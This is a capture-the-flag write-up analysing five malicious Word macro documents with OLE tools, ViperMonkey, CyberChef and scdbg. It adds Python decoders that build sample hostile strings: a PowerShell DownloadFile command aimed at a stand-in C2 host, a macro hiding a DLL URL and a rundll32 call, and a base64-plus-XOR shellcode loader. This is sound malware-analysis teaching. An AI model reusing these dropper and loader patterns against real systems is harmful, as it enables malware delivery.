# Squid Game

## This room covers forensic analysis of malicious documents

## Attacker 1

The toolset used here to analyze malicious macros and other malicious code in .doc documents is the OLE tooling: oledump together with the oletools suite (olevba, olemeta, oletimes).

First, a look at the file with oledump:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FDaiKVpcFWxSeQNTJeA2J%2Fimage.png?alt=media&#x26;token=f46112c3-b7f8-4cfa-977d-77d99481df78" alt=""><figcaption></figcaption></figure>

The first question asks for the malicious C2 domain. It can be found in the maldoc at the point where an executable is downloaded, so finding the C2 means locating executable-related strings and obfuscated code; we will look through the streams to see what is inside.

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FFWVbMXssJptkJElBkfs0%2Fimage.png?alt=media&#x26;token=dc933e0d-de24-4be3-9683-588a12ba6c6f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FukqvSqg4I2RR83TJGX5P%2Fimage.png?alt=media&#x26;token=a16fdaeb-a63f-4f7a-a23a-1d713edf522f" alt=""><figcaption></figcaption></figure>

Stream 4 contains something like a PowerShell command, obfuscated and base64-encoded; when called, it looks like it will download something and call out to the C2 domain.

More information is needed to identify it.

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FC8P8eYCoBDHhnm5nv66y%2Fimage.png?alt=media&#x26;token=4ed04f37-006c-42cc-8f53-8c45893d6c96" alt=""><figcaption></figcaption></figure>

Let's try analyzing the source code with olevba:

Note the highlighted part: it replaces 'A' with '\[', so we can apply that to the code we found in the previous section.

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FNiWkm2erKpWQIW0ydYqk%2Fimage.png?alt=media&#x26;token=9ec0cf3d-4870-46e2-92c8-f11cc9692feb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FEYZXOxV2MACt6EnCj9Wd%2Fimage.png?alt=media&#x26;token=1a698a26-ed0c-441e-90ec-09e92c5a81a9" alt=""><figcaption></figcaption></figure>

Now we can see the C2 domain, and the answer to question 2 as well: it tries to fetch the folder containing the file right there.
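The same undo-the-swap-then-base64-decode step done in Python, as an added example that is not part of the original write-up. The command, the placeholder URL `c2.example.invalid` and the blob are constructed here so the decoder can be checked; the maldoc's own blob is only in the screenshots.

```python
import base64
import re

# Constructed sample, not the room's maldoc: a PowerShell download one-liner,
# encoded the way "powershell -EncodedCommand" expects (UTF-16LE, then base64),
# with every 'A' swapped for '[' so the blob no longer decodes as base64.
SAMPLE_COMMAND = ("(New-Object Net.WebClient).DownloadFile("
                  "'http://c2.example.invalid/drop.exe', $env:TEMP + '\\drop.exe')")


def obfuscate_like_macro(command: str) -> str:
    """Reproduce the maldoc's trick on a known command so the decoder can be checked."""
    b64 = base64.b64encode(command.encode("utf-16le")).decode("ascii")
    return b64.replace("A", "[")


SAMPLE_BLOB = obfuscate_like_macro(SAMPLE_COMMAND)


def decode_powershell_blob(blob: str, fake: str = "[", real: str = "A") -> str:
    """Undo the character swap, base64-decode, then pick the text encoding.

    '[' is not a base64 character, so restoring 'A' is unambiguous. PowerShell's
    -EncodedCommand is UTF-16LE (every second byte of ASCII text is NUL); a blob
    decoded inside the script with FromBase64String is usually UTF-8.
    """
    raw = base64.b64decode(blob.replace(fake, real), validate=True)
    high_bytes = raw[1::2]
    if high_bytes and all(b == 0 for b in high_bytes):
        return raw.decode("utf-16le")
    return raw.decode("utf-8")


URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


def extract_urls(text: str) -> list:
    """Pull candidate C2 URLs out of the recovered command."""
    return URL_RE.findall(text)


if __name__ == "__main__":
    cmd = decode_powershell_blob(SAMPLE_BLOB)
    print(cmd)
    print("URLs:", extract_urls(cmd))
```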

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2F4tDmUHx9TgtidIXELN5z%2Fimage.png?alt=media&#x26;token=3a7fcce8-52a4-46de-a3f6-fd6b11bae99c" alt=""><figcaption></figcaption></figure>

This gives the answer to the next question; let's take a look at what happens when PowerShell is used to check it.

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FpE02r4AVKnzrIFk0duL4%2Fimage.png?alt=media&#x26;token=36b423c7-d055-43aa-9897-b86852a7c6c5" alt=""><figcaption></figcaption></figure>

Following the hint and some research about CLSIDs, we have the CLSID here too:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FBrAzKeaYoHKUDSQusEr9%2Fimage.png?alt=media&#x26;token=3dc0f38b-56ac-467a-a692-75970272b469" alt=""><figcaption></figcaption></figure>

Researching this CLSID turns up an article about it: <https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/>

And we get the answer we need:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FiewSCowJs4iOa7hb2HRH%2Fimage.png?alt=media&#x26;token=5d1fd09f-6dae-4e75-b7f4-ef43e7d42ce1" alt=""><figcaption></figcaption></figure>

We can also see the IP and the .php extension:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FO9gAH115ETqqufEy8B8N%2Fimage.png?alt=media&#x26;token=59cbea33-ee96-4fd6-ad61-13d60ffe3225" alt=""><figcaption></figcaption></figure>

The next question does not need that, so switch to another tool from oletools, olemeta, which extracts all the standard document properties:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FLFKaGEVOOfOMbAHZBQsH%2Fimage.png?alt=media&#x26;token=4ce4ca54-6ed3-42d1-b185-192071f12d84" alt=""><figcaption></figcaption></figure>

That also gives the answer about the phone number.

Back to olevba to get what we need for the next question:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FDFn8k1Fd8CgkB3w0hQZS%2Fimage.png?alt=media&#x26;token=cf4be09e-cf4d-4091-8897-55624b906066" alt=""><figcaption></figcaption></figure>

The subject is right there in the olemeta output:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2Fel9JQ8EprSde73izPk6f%2Fimage.png?alt=media&#x26;token=1e12d143-b62d-4463-90ac-045e4413b6d9" alt=""><figcaption></figcaption></figure>

oletimes helps with the next question:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FWomntTR6Vh6KrEnS9nGa%2Fimage.png?alt=media&#x26;token=12a42da0-7880-4af2-ba3b-919b42d992ad" alt=""><figcaption></figcaption></figure>

oledump provides the answers to the last two questions:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FURJbasuDJbenatNAgTZI%2Fimage.png?alt=media&#x26;token=32d8a8c2-f265-4888-bd7c-05a0e9afb9d1" alt=""><figcaption></figcaption></figure>

The M indicator marks a stream that contains a macro, which is what we need.

## Attacker 2

Now that we are familiar with the OLE tools, let's move on to the second maldoc:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FR9YEzAfBhDhp7crZ1TXF%2Fimage.png?alt=media&#x26;token=67358ed6-c580-4095-bff1-effba9ee12c8" alt=""><figcaption><p>This file has more macros, and it also gives us the answer to the first question</p></figcaption></figure>

The -i option provides extra information:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FinSTQw2CYX0Njlw3pK4M%2Fimage.png?alt=media&#x26;token=98c99241-a2d4-453c-8551-be948d15643a" alt=""><figcaption></figcaption></figure>

So 15671 is the total size of the code (compiled and not), and 13867 is the compiled code in the stream that contains the macro; from this we can also see the highest byte count for the next question.

We will search through the whole stream; the -v option in oledump decompresses the VBA script that may be contained in a stream:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2Fq3k0mgDW2AFk7wkjnZc1%2Fimage.png?alt=media&#x26;token=da7a5f02-c5cd-4036-a91f-2c8bc9e7cdb7" alt=""><figcaption></figcaption></figure>

This might be the string we need; reverse it to get the answer:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2F95V3dpwxHNuXK9taAbQU%2Fimage.png?alt=media&#x26;token=267eba2f-bae5-4621-bbc6-172b9e93290e" alt=""><figcaption></figcaption></figure>

Next is finding the two domains. They will start with http, so I search for that again; I prefer the -S option, which dumps the string output.

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FjAIIkC3I8o6CYRrvT38c%2Fimage.png?alt=media&#x26;token=87a2704d-da9b-43e0-b17f-203c29e5ef77" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FBBQFboCIiv25Ij4KXj0v%2Fimage.png?alt=media&#x26;token=cde99392-40b6-42d0-b6ea-df86772fd1fa" alt=""><figcaption></figcaption></figure>

Stream 9 shows what looks like a suspicious domain, and we get the first two domains for the answer. Taking a closer look, we can also get the answers to the next two questions: the DLL file name and number are right there, and so is the path (C:\\).

rundll32.exe is what runs the DLL file; this is worth researching further.

Stream 9 contains the information we need for the next question: because the VBS script is in here, this is where the important details we need to find out and investigate are:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FCOfXEV1O3aJUCEtnmvpT%2Fimage.png?alt=media&#x26;token=9d1f876f-6f64-48bf-97a6-eddceabaaf13" alt=""><figcaption></figcaption></figure>

Here we find how long the maldoc sleeps so the malicious DLLs can fully execute (15000 milliseconds). For the stream name in the last question, just run oledump again and we get it.

## Attacker 3

Let's take a look with oledump first:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FKIwGMIMpILLp3JoWCycy%2Fimage.png?alt=media&#x26;token=796541d7-23b0-40a3-b777-b2411ed07c5d" alt=""><figcaption></figcaption></figure>

Now we look for the executable, so we can do the same as in the Attacker 2 step, changing the search term and the document file:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FgBmZdQWMNWkNbiNnDwxC%2Fimage.png?alt=media&#x26;token=3cf0f0bb-87ba-4c2d-9487-0a3dec56ba95" alt=""><figcaption><p>Got the answer for the first question</p></figcaption></figure>

Looking at this, we can see that the % signs denote a variable and that it gets replaced:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FRDZGgZCdxM72Z56DMmCl%2Fimage.png?alt=media&#x26;token=937b5639-40d2-40c9-9b34-6bf6cecc2745" alt=""><figcaption></figcaption></figure>

So the answer to the next question is certutil.

Using the same method to search for http or https does not give back anything useful, so here we have another tool for this, ViperMonkey: ViperMonkey is a VBA emulation engine written in Python, designed to analyze and deobfuscate malicious VBA macros contained in Microsoft Office files.

Read more about it on GitHub: <https://github.com/decalage2/ViperMonkey>

Let's try it on this file:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2F2UixijGkmO2KxGeME3Nb%2Fimage.png?alt=media&#x26;token=c868067c-5238-4507-b456-49f25cda115c" alt=""><figcaption></figcaption></figure>

Scrolling down and looking carefully, we can see the suspicious http link here:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FL4gRL6ICZJvKu18moC4o%2Fimage.png?alt=media&#x26;token=f1641bc3-a8ec-4df9-8420-708e8b286c32" alt=""><figcaption><p>Also the folder it drops into (ProgramData)</p></figcaption></figure>

Looking again at the earlier oledump result, we can see the stream that executes the binary:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FcHlrGYnBbFI8tcp0X2eJ%2Fimage.png?alt=media&#x26;token=6e506663-e38d-4818-9629-bdb658bec2f5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FJWL0sxvkjnyvbBcMpZaU%2Fimage.png?alt=media&#x26;token=abe585ad-60fe-4056-9e45-39b1f438dcec" alt=""><figcaption><p>So A3 is the answer we need</p></figcaption></figure>

## Attacker 4

Again, oledump first to look at the streams:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FzWEVq0YE7nPilzCIdzFe%2Fimage.png?alt=media&#x26;token=1feedfe4-b876-4bf4-bad2-bb30d3308859" alt=""><figcaption></figcaption></figure>

Stream 7 contains the macro; let's take a deeper look into it.

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FawYx88VYjezgKswkJNQK%2Fimage.png?alt=media&#x26;token=e338bf2e-ea33-4e41-8764-923841832035" alt=""><figcaption></figcaption></figure>

Scrolling down, we can see this:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FrLZPmkPM4qX8WmgW7bsT%2Fimage.png?alt=media&#x26;token=3a9a226c-c480-493b-a8a5-93a47f9636d6" alt=""><figcaption></figcaption></figure>

This is the XORI function in VBA: the first parameter takes the text and the second is the key. We can read more about it here: <https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/deobfuscating-malicious-macros-using-python/>

So let's decode that string:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FL2NvYjoClIaVY0AsDgaN%2Fimage.png?alt=media&#x26;token=fa135b03-94e7-4efc-8e7f-1745a736bce8" alt=""><figcaption><p>Looks like we got the answer to the first question</p></figcaption></figure>
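The XORI decoding done in Python, as an added example that is not part of the original write-up. It assumes XORI is the usual repeating-key form (Asc of each text character XORed with the cycling key, back through Chr) and that the macro passes the arguments as plain string literals; the sample macro, its key `Squid` and the hidden strings are constructed here, not taken from the room's document.

```python
import re


def xori(text: str, key: str) -> str:
    """Repeating-key XOR, character by character, as the macro's XORI is assumed
    to work. XOR is its own inverse, so the same call decodes what it encoded."""
    if not key:
        raise ValueError("XORI needs a non-empty key")
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(text))


# Matches literal calls such as XORI("ciphertext", "key"). A negated class also
# matches control characters, which the obfuscated literal may well contain.
XORI_CALL = re.compile(r'XORI\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')


def decode_xori_calls(macro_source: str) -> list:
    """Decode every XORI("...", "...") call found in extracted macro source."""
    return [xori(ct, key) for ct, key in XORI_CALL.findall(macro_source)]


# Constructed sample (not the room's maldoc): the kinds of strings a dropper
# hides behind XORI, wrapped with a constructed key.
SAMPLE_KEY = "Squid"
SAMPLE_SECRETS = [
    "http://c2.example.invalid/a.dll",
    "c:\\programdata\\a.dll",
    "rundll32.exe",
]


def build_sample_macro() -> str:
    """Build macro text that hides SAMPLE_SECRETS the way the page's macro does."""
    enc = [xori(s, SAMPLE_KEY) for s in SAMPLE_SECRETS]
    return (
        "Sub AutoOpen()\n"
        f'    url = XORI("{enc[0]}", "{SAMPLE_KEY}")\n'
        f'    dst = XORI("{enc[1]}", "{SAMPLE_KEY}")\n'
        f'    cmd = XORI("{enc[2]}", "{SAMPLE_KEY}")\n'
        "End Sub\n"
    )


if __name__ == "__main__":
    for plain in decode_xori_calls(build_sample_macro()):
        print(repr(plain))
```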

For the next two questions, let's decode more of the strings below that are passed to the XORI function; this is what we need:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FPjdlZxgAvFB2wxKq8KdL%2Fimage.png?alt=media&#x26;token=d6c55a5a-2774-409e-ac03-b179f04133ae" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2Fi3EyOsQjo5asv8KjUTaE%2Fimage.png?alt=media&#x26;token=9dc3de2e-ab62-4c6b-b555-fa7279ee6afa" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FWRfeXtOyvLEhy4iiY5ei%2Fimage.png?alt=media&#x26;token=d6b6a760-bce0-49cd-9bcc-19ae32cd0d2a" alt=""><figcaption></figcaption></figure>

The same for the second binary:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FSWQwA8lYwu94myv5Hmoz%2Fimage.png?alt=media&#x26;token=68501905-1510-422a-8c0c-afc203242ee7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2F7PYMG4ARortFYRx27CGu%2Fimage.png?alt=media&#x26;token=3bd7218b-9aab-42cf-8dc3-5f58a6cc6b38" alt=""><figcaption><p>From here we get the last answer for Attacker 4 too</p></figcaption></figure>

## Attacker 5

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FYTbkmSFbJdcrCvkosOBa%2Fimage.png?alt=media&#x26;token=d53a7cfe-ebcc-4a3d-bb2b-f2bac71535d9" alt=""><figcaption><p>oledump to take a first look at the streams</p></figcaption></figure>

Now let's find the caption; with the -e option we can extract the objects embedded in the file:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FWEaASn9n2mg8HQuv4phc%2Fimage.png?alt=media&#x26;token=74f3539d-36d1-4094-b61b-50fe194f012b" alt=""><figcaption><p>Got the answer we need for the first question</p></figcaption></figure>

Next, running vmonkey on this file gives us the base64-encoded data.

After removing the null bytes we get some information:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FG2WBRoBYjpo41M7LEi6j%2Fimage.png?alt=media&#x26;token=9890706f-a0d3-412c-9d2c-df51f6fcf423" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2F7DBZisIPPbpt59QRgZ9l%2Fimage.png?alt=media&#x26;token=b7829665-1c26-4ceb-8e71-f3e4c07cb869" alt=""><figcaption></figcaption></figure>

We can see gzip compression here; luckily CyberChef has a Gunzip operation that decompresses the base64-decoded output:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FMcYfR8UFW9GadP4E6FOl%2Fimage.png?alt=media&#x26;token=2dfa352e-934a-4c72-b0ae-21fea579628c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FPBFWYMfGRd5lPoe9klsI%2Fimage.png?alt=media&#x26;token=d70db7c5-ea4c-4613-887e-1e09e691151f" alt=""><figcaption><p>We got the answer here too</p></figcaption></figure>

That code XORs the base64-decoded data with 35, so let's run another decode on it:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FUUpY2ZKDG0f5WpQSOVA2%2Fimage.png?alt=media&#x26;token=ced93780-f5f8-4e89-af30-4111381395e6" alt=""><figcaption><p>We can also see the IP address right there, and the answer to the User-Agent question</p></figcaption></figure>
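The three layers the page unwraps by hand in CyberChef (base64, gzip, then base64 and XOR with 35), done in one Python pass as an added example that is not part of the original write-up. The loader text, the stand-in "shellcode" bytes, the User-Agent string and the IP `198.51.100.23` are all constructed here; only the XOR constant 35 comes from the page.

```python
import base64
import gzip
import re

XOR_KEY = 35  # the constant the page's loader applies to every byte of the inner blob


def unwrap_gzip_layer(outer_b64: str) -> str:
    """Layer 1: base64 -> gzip -> the PowerShell loader script as text."""
    return gzip.decompress(base64.b64decode(outer_b64)).decode("utf-8")


INNER_B64 = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")


def unwrap_xor_layer(loader_script: str, key: int = XOR_KEY) -> bytes:
    """Layer 2: pull the inner base64 literal out of the loader, decode it,
    and XOR every byte with the key, which is what the loader's loop does."""
    m = INNER_B64.search(loader_script)
    if not m:
        raise ValueError("no FromBase64String('...') literal in loader")
    return bytes(b ^ key for b in base64.b64decode(m.group(1)))


def unwrap_all(outer_b64: str) -> bytes:
    return unwrap_xor_layer(unwrap_gzip_layer(outer_b64))


def extract_user_agent(payload: bytes):
    m = re.search(rb"User-Agent:\s*([\x20-\x7e]+)", payload)
    return m.group(1).decode("ascii") if m else None


def extract_ipv4(payload: bytes) -> list:
    return [ip.decode("ascii") for ip in re.findall(rb"\b(?:\d{1,3}\.){3}\d{1,3}\b", payload)]


# Constructed stand-in for the shellcode (filler bytes around the HTTP header
# strings that a stage-two payload embeds); it is not real shellcode.
FAKE_SHELLCODE = (b"\x90" * 8
                  + b"User-Agent: Mozilla/5.0 (constructed)\r\nHost: 198.51.100.23\r\n"
                  + b"\xcc" * 4)


def build_sample_blob() -> str:
    """Re-create the wrapping on FAKE_SHELLCODE so the unwrapping can be checked."""
    inner = base64.b64encode(bytes(b ^ XOR_KEY for b in FAKE_SHELLCODE)).decode("ascii")
    loader = ("[Byte[]]$var_code = [System.Convert]::FromBase64String('" + inner + "')\n"
              "for ($x = 0; $x -lt $var_code.Count; $x++) "
              "{ $var_code[$x] = $var_code[$x] -bxor 35 }\n")
    return base64.b64encode(gzip.compress(loader.encode("utf-8"))).decode("ascii")


if __name__ == "__main__":
    sc = unwrap_all(build_sample_blob())
    print("User-Agent:", extract_user_agent(sc))
    print("IPv4 strings:", extract_ipv4(sc))
```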

It is not very readable, but we can see the User-Agent, which probably means this is shellcode; we have a tool to analyze it, `scdbg`.

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FmfxfryBfjmk78O957Uvf%2Fimage.png?alt=media&#x26;token=bc7d09cd-953d-4de3-86af-a2e794c3d11a" alt=""><figcaption><p>We can try another one right there</p></figcaption></figure>

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FAlKc6dmF9PrCTrlLLt31%2Fimage.png?alt=media&#x26;token=0a361c09-1d43-47b6-9fb3-5030aba0c735" alt=""><figcaption><p>Take a look at this tool's options</p></figcaption></figure>

Let's save the file first, then use this tool to analyze the shellcode:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2FuVzqWepypwtxOizBJpRs%2Fimage.png?alt=media&#x26;token=41b7aeaa-8211-4a43-a208-836ba7c073e5" alt=""><figcaption></figcaption></figure>

Let's try the basic usage first:

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2F4PLTlp9fYNgLnYN3eLOy%2Fimage.png?alt=media&#x26;token=a41f1697-6554-46d2-90e1-04ba2e2eb136" alt=""><figcaption><p>I got the port number too</p></figcaption></figure>

For the path value we can use /s, or upload the file to VirusTotal as another way (VirusTotal also provides the port number of the server it connects to and the IP):

<figure><img src="https://1038241181-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fbr7avii8O2bCJtM7fDhm%2Fuploads%2F0NkU4eRGC1GsTZFnpAHM%2Fimage.png?alt=media&#x26;token=e226075c-47c1-4e8e-82e7-d2c729c1abd2" alt=""><figcaption><p>We can also see the first two APIs right there (LoadLibraryA and InternetOpenA)</p></figcaption></figure>

Note: we can upload the file to VirusTotal from outside the machine.


